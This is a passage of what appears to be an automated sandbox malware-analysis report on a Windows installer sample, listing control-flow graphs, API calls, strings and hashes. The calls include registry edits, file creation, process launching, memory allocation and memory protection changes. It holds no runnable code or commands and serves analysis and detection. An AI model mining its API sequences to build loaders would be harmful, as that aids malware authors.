                                                          APIs
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:

                                                          Control-flow Graph

                                                          control_flow_graph 808 700516db-70051717 call 70051a98 812 70051834-70051836 808->812 813 7005171d-70051721 808->813 814 70051723-70051729 call 700522af 813->814 815 7005172a-70051737 call 700522f1 813->815 814->815 820 70051767-7005176e 815->820 821 70051739-7005173e 815->821 822 70051770-7005178c call 700524d8 call 70051559 call 70051266 GlobalFree 820->822 823 7005178e-70051792 820->823 824 70051740-70051741 821->824 825 70051759-7005175c 821->825 845 700517e3-700517e7 822->845 829 70051794-700517da call 7005156b call 700524d8 823->829 830 700517dc-700517e2 call 700524d8 823->830 827 70051743-70051744 824->827 828 70051749-7005174a call 70052a38 824->828 825->820 831 7005175e-7005175f call 70052cc3 825->831 833 70051746-70051747 827->833 834 70051751-70051757 call 700526b2 827->834 841 7005174f 828->841 829->845 830->845 844 70051764 831->844 833->820 833->828 849 70051766 834->849 841->844 844->849 850 70051824-7005182b 845->850 851 700517e9-700517f7 call 7005249e 845->851 849->820 850->812 856 7005182d-7005182e GlobalFree 850->856 858 7005180f-70051816 851->858 859 700517f9-700517fc 851->859 856->812 858->850 861 70051818-70051823 call 700514e2 858->861 859->858 860 700517fe-70051806 859->860 860->858 862 70051808-70051809 FreeLibrary 860->862 861->850 862->858
                                                          APIs
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D09
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D0E
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D13
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051786
                                                          • FreeLibrary.KERNEL32(?), ref: 70051809
                                                          • GlobalFree.KERNEL32(00000000), ref: 7005182E
                                                            • Part of subcall function 700522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700522E0
                                                            • Part of subcall function 700526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70051757,00000000), ref: 70052782
                                                            • Part of subcall function 7005156B: wsprintfA.USER32 ref: 70051599
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:

                                                          Control-flow Graph

                                                          control_flow_graph 865 401c2e-401c4e call 402bac * 2 870 401c50-401c57 call 402bce 865->870 871 401c5a-401c5e 865->871 870->871 873 401c60-401c67 call 402bce 871->873 874 401c6a-401c70 871->874 873->874 877 401c72-401c8e call 402bac * 2 874->877 878 401cbe-401ce4 call 402bce * 2 FindWindowExA 874->878 888 401c90-401cac SendMessageTimeoutA 877->888 889 401cae-401cbc SendMessageA 877->889 890 401cea 878->890 891 401ced-401cf0 888->891 889->890 890->891 892 401cf6 891->892 893 402a5a-402a69 891->893 892->893
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !

                                                          Control-flow Graph

                                                          control_flow_graph 896 402476-4024a7 call 402bce * 2 call 402c5e 903 402a5a-402a69 896->903 904 4024ad-4024b7 896->904 906 4024c7-4024ca 904->906 907 4024b9-4024c6 call 402bce lstrlenA 904->907 910 4024e1-4024e4 906->910 911 4024cc-4024e0 call 402bac 906->911 907->906 912 4024f5-402509 RegSetValueExA 910->912 913 4024e6-4024f0 call 4030d8 910->913 911->910 917 40250b 912->917 918 40250e-4025eb RegCloseKey 912->918 913->912 917->918 918->903
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000023,00000011,00000002), ref: 004024C1
                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 00402501
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp
                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C08
                                                          Strings
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: 4f6e99611feb600a1a309dae17313cb646ed486db5988612a5590cb9f56acaba
                                                          • Instruction ID: e4cc8bcb7752a4f6b3811e2611bd1e0fa57f8e281b648bd21e3e74c9503b19de
                                                          • Opcode Fuzzy Hash: 4f6e99611feb600a1a309dae17313cb646ed486db5988612a5590cb9f56acaba
                                                          • Instruction Fuzzy Hash: 74219673644101EBDB20EB65DE88E5E73E8EB44318711413BF602B72D1DB78D8529B5D
                                                          APIs
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                          • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                          • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                          • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                          • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                          • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                          • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          APIs
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                          • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                          • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                          • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                          • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                          • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                          • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 70052AF7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: wsprintf
                                                          • String ID:
                                                          • API String ID: 2111968516-0
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          APIs
                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          APIs
                                                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(7005404C,00000004,00000040,7005403C), ref: 7005293F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                            • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                            • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                            • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                            • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                          • GetClientRect.USER32(?,?), ref: 00405407
                                                          • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                          • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                          • EmptyClipboard.USER32 ref: 00405686
